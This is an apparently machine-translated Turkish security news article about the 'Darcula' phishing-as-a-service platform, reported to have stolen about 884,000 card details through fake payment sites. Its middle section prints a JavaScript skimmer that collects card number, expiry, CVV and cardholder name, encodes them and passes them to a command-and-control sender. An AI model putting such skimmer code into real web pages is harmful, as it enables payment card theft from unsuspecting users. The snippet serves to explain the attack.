%20Stolen%20884,000%20Credit%20Card%20Details%20on%2013%20Million%20Clicks%20from%20Users%20Worldwide.webp?w=696&resize=696,0&ssl=1 "Darcula (PHAAS), dünya çapında kullanıcılardan 13 milyon tıklamayla 884.000 kredi kartı detayını çaldı")
Güvenlik araştırmacıları, dünya çapında şüphesiz kullanıcılardan 13 milyondan fazla tıklama oluşturan büyük bir kampanya ile yaklaşık 884.000 kredi kartı detayını çalmaktan sorumlu “Darcula” adlı sofistike bir Hizmet Olarak Kimlik Yardımı (PHAAS) platformu ile yakın tarihteki en büyük kredi kartı hırsızlığı operasyonlarından birini ortaya çıkardılar.
2024’ün sonlarında başlayan operasyon, 32 ülkede tüketicileri hedefledi ve Kuzey Amerika ve Avrupa’daki kurbanların en yüksek konsantrasyonuna sahip.
Güvenlik uzmanları, finansal hasarın çalınan finansal veriler için mevcut karanlık web değerlerine göre 150 milyon doları aşabileceğini tahmin ediyor.
.png
)
Darcula platformu, gelişmiş altyapısı ve abonelik tabanlı model aracılığıyla kendisini tipik kimlik avı operasyonlarından ayırır ve düşük vasıflı siber suçluların bile sofistike saldırılar başlatmasına izin verir.
Hizmet, müşterilere gerçekçi SSL sertifikaları ve algılamadan kaçınmak için tasarlanmış alan adları ile tamamlanan bankacılık web siteleri, e-ticaret platformları ve ödeme portalları konusunda ikna edici kopyalar sağlar.
En önemlisi, Darcula’nın kimlik doğrulama kodlarını kesen ve aktaran gerçek zamanlı oturum kaçırma teknikleri aracılığıyla çok faktörlü kimlik doğrulamasını atlama yeteneğidir.
Büyük kampanyanın başarısı, e-posta, SMS, sosyal medya mesajlaşma ve tehlikeye atılan reklam ağları aracılığıyla kötü niyetli bağlantılar sunan çok kanallı yaklaşımından kaynaklanıyor.
Mağdurlar genellikle hesapları veya satın alımlarıyla ilgili sorunlar talep eden acil mesajlar alır ve bunları kimlik bilgilerini ve ödeme bilgilerini yakalayan hileli sitelere yönlendirir.
Operasyonun ölçeği, önemli kaynaklar ve arkasında teknik uzmanlığa sahip iyi organize edilmiş bir siber suç sendikası önermektedir.
Anımsatıcı analistler, finansal kurumlar tarafından bildirilen bir kredi kartı hırsızlığı modelini izledikten sonra Şubat 2025’te Darcula operasyonunu tespit etti.
Araştırmacılar, Doğu Avrupa ve Güneydoğu Asya’da bulunan birincil sunucular ile birden fazla ülkeyi kapsayan bir komuta ve kontrol altyapısı keşfettiler.
“Darcula’yı özellikle tehlikeli yapan şey, modüler mimarisi ve sürekli evrimidir” diye açıkladı Dr.
Elena Vasquez, Mnemonic’in baş siber güvenlik araştırmacısı. “Operatörler tespitten kaçınmak için tekniklerini sürekli olarak güncelliyorlar.”
Darcula’nın en sofistike yönü, güvenlik çözümlerinden kaçınmak için çok aşamalı bir yük dağıtım sistemi kullanan gelişmiş enfeksiyon mekanizmasıdır.
İlk Erişim
İlk erişim, sahte ödeme sayfalarına gömülü görünüşte zararsız JavaScript kodu ile başlar:-
function validateInput() {
// Legitimate-looking form validation
collectCardData();
// Hidden function that executes the actual theft
setTimeout(function() {
let exfiltrationPayload = {
cardNum: document.getElementById('ccnumber').value,
expDate: document.getElementById('expdate').value,
cvv: document.getElementById('cvv').value,
name: document.getElementById('cardholder').value
};
sendToC2(btoa(JSON.stringify(exfiltrationPayload)));
}, 500);
return true;
}Kullanıcılar bilgilerini bu ikna edici sahtecilere girdiğinde, JavaScript verileri yakalar ve ara sunuculara iletilmeden önce şifreler.
Genellikle meşru web sitelerini tehlikeye atan bu sunucular, Darcula’nın güvenli depolama altyapısına ulaşmadan önce bilgileri bir dizi vekil aracılığıyla aktarır.
Bu çok hızlı mimari, ilişkilendirmeyi kolluk kuvvetleri için son derece zorlaştırıyor.
Finansal kurumlar ve siber güvenlik şirketleri Darcula tehdidiyle mücadele etmek için ortak bir görev gücü oluşturdu.
Kuruluşların gelişmiş kimlik avı tespit sistemleri uygulamalarını ve çalışanlar ve müşteriler için düzenli güvenlik bilinci eğitimi almasını önermektedir.
Bireyler, hassas bilgiler girmeden önce resmi kanallar aracılığıyla web sitesi özgünlüğünü doğrulamalı ve yetkisiz ücretleri hızlı bir şekilde tanımlamak için işlem bildirimlerini etkinleştirmelidir.
Birden fazla yargı bölgesindeki kolluk kuvvetleri, Darcula operatörlerini izleme çabalarını koordine etmektedir, ancak operasyonun sofistike doğasını, atıf ve kovuşturma için önemli zorluklar sunar.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.